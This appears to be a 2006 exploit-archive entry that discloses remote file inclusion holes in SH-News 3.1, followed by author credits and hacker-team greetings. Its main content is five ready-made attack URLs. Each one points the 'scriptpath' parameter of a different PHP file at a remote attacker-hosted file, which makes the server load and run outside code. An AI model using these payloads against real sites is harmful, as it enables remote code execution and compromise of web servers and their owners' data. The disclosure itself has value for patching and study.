SH-News <= 3.1 (scriptpath) Multiple Remote File Include Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : SH-News <= 3.1 (scriptpath) Multiple Remote File Include Vulnerabilities
# Published : 2006-10-11
# Author : v1per-haCker
# Previous Title : PHP News Reader <= 2.6.4 (phpbb.inc.php) Remote File Include Exploit
# Next Title : Minichat v6 (ftag.php) Remote File Include Vulnerability

#==================================================================
#  SH-News (RFI)
#==================================================================
# Info:-
#
# Scripts:  SH-News
# Download: http://www.hotscripts.com/jump.php?listing_id=19561&jump_type=1
# Version : 3.1
# Dork & vuln : download scripts and think :)
# Note : The vuln not tested on other version :)
#
#==================================================================
#Exploit :
#
#http://localhost/path/report.php?scriptpath=http://EvElCoDe.txt?
#http://localhost/path/archive.php?scriptpath=http://EvElCoDe.txt?
#http://localhost/path/comments.php?scriptpath=http://EvElCoDe.txt?
#http://localhost/path/init.php?scriptpath=http://EvElCoDe.txt?
#http://localhost/path/news.php?scriptpath=http://EvElCoDe.txt?
#
#==================================================================
#Discoverd By : v1per-haCker
#
#Conatact : v1per-hacker[at]hotmail.com
#XP10_hackEr Team
#Greetz to : abu_shahad ; RooT-shilL ; hitler_jeddah ; BooB11 ; FaTaL ;
#               ThE-WoLf-KsA ; mohandko ; fooooz ; maVen ; fucker_net ;
#	    metoovet
#and all members in XP10_hackEr Team
#thanx to str0ke :)
#WWW.XP10.COM
===================================================================

# www.Syue.com [2006-10-11]